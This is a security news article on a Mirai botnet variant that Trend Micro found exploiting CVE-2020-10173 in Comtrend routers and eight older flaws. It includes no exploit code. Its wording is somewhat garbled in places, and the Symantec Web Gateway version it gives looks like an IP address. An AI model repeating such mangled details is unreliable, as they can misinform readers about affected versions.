An exploit for a vulnerability affecting Comtrend routers includes a newly identified version of the Mirai Internet of Things (IoT) botnet.
Initially discovered in 2016 and having its source code released online in October of the same year, Mirai was the base of numerous distributed denial of service ( DDoS) botnets, several of which emerged in recent months alone, including SORA, UNSTABLE, and Mukashi, among others.
In terms of targeted devices or intrusion techniques, each of the Mirai variants has brought something new to the table, and the latest detected iteration is no different.
This is the first botnet version to hit CVE-2020-10173, a weakness in the Comtrend VR-3033 routers, according to security researchers at Trend Micro.
The issue, an authenticated vulnerability in the injection of commands, could be exploited by remote attackers to “compromise the router-run network,” Trend Micro explains.
Proof-of – concept (PoC) code for the vulnerability has been publicly released, but this Mirai version is the first malware to attempt to exploit it at large.
However, CVE-2020-10173 is only one of the vulnerabilities targeted by that iteration of malware. It does, it contains exploits for a total of nine vulnerabilities, including a fairly recent problem in GPON routers from Netlink.
The security flaw, a vulnerability for remote execution of code, was discovered earlier this year, but has already been added to the Hoaxcalls botnet arsenal.
In addition to these two weaknesses, the latest Mirai version addresses a number of older security issues that have been exploited in the past by numerous other botnets, including bugs affecting LG SuperSign EZ CMS, AVTECH devices, D-Link devices, MVPower DVR, Symantec Web Gateway 220.127.116.11 and ThinkPHP.
“The use of CVE-2020-10173 in the code of this version demonstrates how botnet developers continue to broaden their arsenal to manipulate as many targets as possible and leverage the opening that unpatched devices offer. In particular, newly discovered vulnerabilities offer better opportunities for cyber-criminals. Users, unaware that there is even a vulnerability, may not be able to patch the device before it’s too late, “Trend Micro concludes.
As they appear to copy techniques from one another, the vulnerability affecting Comtrend routers would likely be exploited by other DDoS botnets, the researchers note.